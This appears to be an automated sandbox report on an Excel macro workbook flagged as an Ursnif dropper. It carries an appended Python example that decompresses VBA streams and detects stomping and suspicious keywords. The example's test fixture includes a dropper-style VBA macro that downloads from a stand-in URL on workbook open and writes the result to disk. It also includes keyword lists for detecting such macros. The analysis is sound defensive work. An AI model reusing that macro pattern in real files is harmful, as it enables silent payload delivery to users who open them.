Windows Analysis Report
bnerad4129F.xlsm

Overview

General Information

Sample Name: bnerad4129F.xlsm
Analysis ID: 734111
MD5: 1bb0098ce207236e5a4819560e41a954
SHA1: 5bb00ef5548bd03e1e45f9113497a22de0f95fc6
SHA256: 97450cdcaa220328f6daebf774b425277103dbfe08940b1d5da07f6e2d8dbc49

Detection

Ursnif Dropper
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Italy targeted Ursnif dropper document
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro with suspicious strings
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains OLE streams with suspicious strings
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Found URL in obfuscated visual basic script code
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: vbaProject.bin Binary string: http://www.oracle.com/bne> - obfuscation quality: 4
Source: vbaProject.bin String found in binary or memory: http://www.oracle.com/bne
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML//
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML//BneUploaderService?bne:tickleSession=Truem:443/
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneApplicationService
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneComponentServiceos.lk
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneDownloadServiceeos.lk(
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneDownloadServiceeos.lk(FM51SOK4ODFJXCML07W7O8HY1PLOC
Source: vbaProject.bin String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneUploaderServiceeos.lk

E-Banking Fraud

Source: Initial sample OLE, VBA macro line: Ursnif specific tokens

System Summary

Source: bnerad4129F.xlsm Stream path 'VBA/BneVBAUploader' : found possibly 'ADODB.Stream' functions position, open, read
Source: bnerad4129F.xlsm Stream path 'VBA/Sheet1' : found possibly 'ADODB.Stream' functions mode, open, read
Source: bnerad4129F.xlsm OLE, VBA macro line: Public Function UnZip( ZipFile As String, Optional TargetFolderPath As String = vbNullString, Optional OverwriteFile As Boolean = False ) As Boolean
Source: bnerad4129F.xlsm OLE, VBA macro line: If OverwriteFile Then
Source: bnerad4129F.xlsm OLE, VBA macro line: Kill Environ("Temp") & "Temporary Directory*"
Source: bnerad4129F.xlsm OLE, VBA macro line: CallByName objProperty, Me.StylePropertyVBA, VbLet, Me.StylePropertyValue
Source: bnerad4129F.xlsm OLE, VBA macro line: Set objProperty = CallByName(objProperty, Me.StylePropertyVBA, VbGet)
Source: bnerad4129F.xlsm OLE, VBA macro line: Set objProperty = CallByName(objProperty, Me.StylePropertyVBA, VbGet, Me.StylePropertyValue)
Source: bnerad4129F.xlsm Stream path 'VBA/BneRibbon' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
Source: bnerad4129F.xlsm Stream path 'VBA/BneVBAUploader' : found possibly 'XMLHttpRequest' functions readystate, response, responsexml, status, open, send, setrequestheader
Source: bnerad4129F.xlsm Stream path 'VBA/Sheet1' : found possibly 'XMLHttpRequest' functions response, status, open, send
Source: bnerad4129F.xlsm OLE, VBA macro line: Private m_layoutImage As String
Source: bnerad4129F.xlsm OLE, VBA macro line: m_layoutImage = ""
Source: bnerad4129F.xlsm OLE, VBA macro line: LayoutImage = m_layoutImage
Source: bnerad4129F.xlsm OLE, VBA macro line: Public Sub Workbook_Open()
Source: bnerad4129F.xlsm OLE, VBA macro line: AddBneMsg BNE_ERROR, "Workbook_Open", "Error: " & Err.Number & " " & Err.Description
Source: bnerad4129F.xlsm OLE indicator, VBA macros: true
Source: ~DF31B384211B18428B.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: bnerad4129F.xlsm OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\Desktop\~$bnerad4129F.xlsm
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{E656762D-7272-4DA5-AD90-1F1FBD4D22C4} - OProcSessId.dat
Source: classification engine Classification label: mal72.bank.expl.evad.winXLSM@1/4@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Window detected: Number of UI elements: 71
Source: bnerad4129F.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: bnerad4129F.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet5.xml
Source: bnerad4129F.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet5.xml.rels
Source: bnerad4129F.xlsm Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: ~DF31B384211B18428B.TMP.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: bnerad4129F.xlsm Stream path 'BneBrowser' : High number of string operations
Source: bnerad4129F.xlsm Stream path 'VBA/BneBrowser' : High number of string operations
Source: bnerad4129F.xlsm Stream path 'VBA/BneRibbon' : High number of string operations
Source: bnerad4129F.xlsm Stream path 'VBA/BneVBAUploader' : High number of string operations
Source: bnerad4129F.xlsm Stream path 'VBA/Sheet1' : High number of string operations

Hooking and other Techniques for Hiding and Protection

Source: bnerad4129F.xlsm Stream path 'VBA/__SRP_1' : xor key: 0x20, keywords: writefile
Source: bnerad4129F.xlsm Stream path 'VBA/__SRP_1' : keywords: writefile
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (27 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

HIPS / PFW / Operating System Protection Evasion

Source: bnerad4129F.xlsm OLE indicator, VBA stomping: true
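The ADO-stream, XMLHttpRequest, Workbook_Open, URL and VBA-stomping findings above are all derived from the VBA module streams inside vbaProject.bin. The following is an added example, not part of the sandbox report and not code from the sample: it decompresses a module stream with the MS-OVBA algorithm ([MS-OVBA] 2.4.1), runs the same kind of keyword heuristics the "possibly related to" lines come from, and flags a module whose source half is empty while its p-code half is present, which is what the "VBA stomped code (only p-code)" signature means. The module bytes, the `Sheet1` source text and the URL `https://example.invalid/payload` are constructed fixtures, and the `MODULEOFFSET` value (where compressed source begins inside the stream) is assumed rather than read from a dir stream. One caveat for triage: the module names (BneRibbon, BneVBAUploader, BneBrowser) and the /OA_HTML/Bne*Service endpoints this report lists are the ones Oracle Web ADI (BNE) spreadsheets carry, so keyword hits on open/read/send should be confirmed against the recovered source rather than taken as a verdict on their own.

```python
"""Offline checks behind the report's VBA findings (added example, constructed fixtures)."""
import re

# Keyword sets of the kind behind the report's "possibly related to" signatures.
ADO_KEYWORDS = ("adodb.stream", ".open", ".read", ".position", ".mode", ".savetofile", ".write")
HTTP_KEYWORDS = ("xmlhttp", ".send", ".setrequestheader", ".responsebody", ".responsetext",
                 ".status", ".readystate")
AUTOEXEC = ("workbook_open", "auto_open", "document_open", "autoopen", "workbook_beforeclose")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
PROC_RE = re.compile(r"^\s*(public |private )?(sub|function|property)\b", re.I | re.M)


def decompress_stream(data: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer (literal and copy tokens)."""
    if not data or data[0] != 0x01:
        raise ValueError("missing 0x01 container signature")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        size = (header & 0x0FFF) + 3              # 12-bit field stores chunk size - 3
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature")
        chunk = data[pos + 2:pos + size]
        pos += size
        if not header & 0x8000:                   # uncompressed chunk: raw bytes
            out += chunk
            continue
        chunk_start = len(out)
        i = 0
        while i < len(chunk):
            flags = chunk[i]
            i += 1
            for bit in range(8):
                if i >= len(chunk):
                    break
                if not (flags >> bit) & 1:        # literal token: one byte
                    out.append(chunk[i])
                    i += 1
                    continue
                token = int.from_bytes(chunk[i:i + 2], "little")
                i += 2
                diff = len(out) - chunk_start
                bit_count = max(4, (diff - 1).bit_length())   # max(ceil(log2(diff)), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):           # byte-wise copy; may overlap itself
                    out.append(out[-offset])
    return bytes(out)


def module_source(stream: bytes, text_offset: int) -> str:
    """Source text of a module stream; text_offset is MODULEOFFSET from the dir stream."""
    return decompress_stream(stream[text_offset:]).decode("latin-1")


def looks_stomped(stream: bytes, text_offset: int) -> bool:
    """Heuristic: p-code half present but the source half declares no procedure.

    A legitimately empty module also matches, so treat a hit as a reason to
    disassemble the p-code, not as proof of tampering.
    """
    return text_offset > 0 and PROC_RE.search(module_source(stream, text_offset)) is None


def scan_source(source: str) -> dict:
    """Keyword heuristics matching the report's ADO / HTTP / auto-exec / URL lines."""
    low = source.lower()
    return {
        "ado_stream": sorted(k for k in ADO_KEYWORDS if k in low),
        "http": sorted(k for k in HTTP_KEYWORDS if k in low),
        "autoexec": sorted(k for k in AUTOEXEC if k in low),
        "urls": sorted(set(URL_RE.findall(source))),
    }


def _literal_container(text: bytes) -> bytes:
    """Fixture helper: build a CompressedContainer made only of literal tokens."""
    body = bytearray()
    for i in range(0, len(text), 8):
        body.append(0x00)                         # flag byte: next eight tokens are literals
        body += text[i:i + 8]
    header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
    return b"\x01" + header.to_bytes(2, "little") + bytes(body)


# Constructed fixtures (not bytes from bnerad4129F.xlsm).
FAKE_PCODE = bytes(64)                            # stand-in for the PerformanceCache half
CLEAN_SRC = (b'Attribute VB_Name = "Sheet1"\r\n'
             b'Private Sub Workbook_Open()\r\n'
             b'  Set h = CreateObject("MSXML2.XMLHTTP")\r\n'
             b'  h.Open "GET", "https://example.invalid/payload", False: h.Send\r\n'
             b'  Set s = CreateObject("ADODB.Stream"): s.Open: s.Write h.responseBody\r\n'
             b'End Sub\r\n')
STOMPED_SRC = b'Attribute VB_Name = "Sheet1"\r\n'  # source wiped, p-code left behind
DROPPER_MODULE = FAKE_PCODE + _literal_container(CLEAN_SRC)
STOMPED_MODULE = FAKE_PCODE + _literal_container(STOMPED_SRC)
# Hand-built chunk exercising a copy token: "ABCDEFGH" then copy offset 8, length 8.
COPY_FIXTURE = b"\x01\x0b\xb0" + b"\x00ABCDEFGH" + b"\x01\x05\x70"

if __name__ == "__main__":
    print("copy token:", decompress_stream(COPY_FIXTURE))
    print("dropper stomped?", looks_stomped(DROPPER_MODULE, len(FAKE_PCODE)))
    print("stomped stomped?", looks_stomped(STOMPED_MODULE, len(FAKE_PCODE)))
    print(scan_source(module_source(DROPPER_MODULE, len(FAKE_PCODE))))
```

On a real file, feed `module_source()` the bytes of each `VBA/<module>` stream from vbaProject.bin together with that module's MODULEOFFSET from the `VBA/dir` stream; the `__SRP_*` streams the report mentions under "Hooking and other Techniques" are compiled caches and are not decompressed this way.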
No contacted IP infos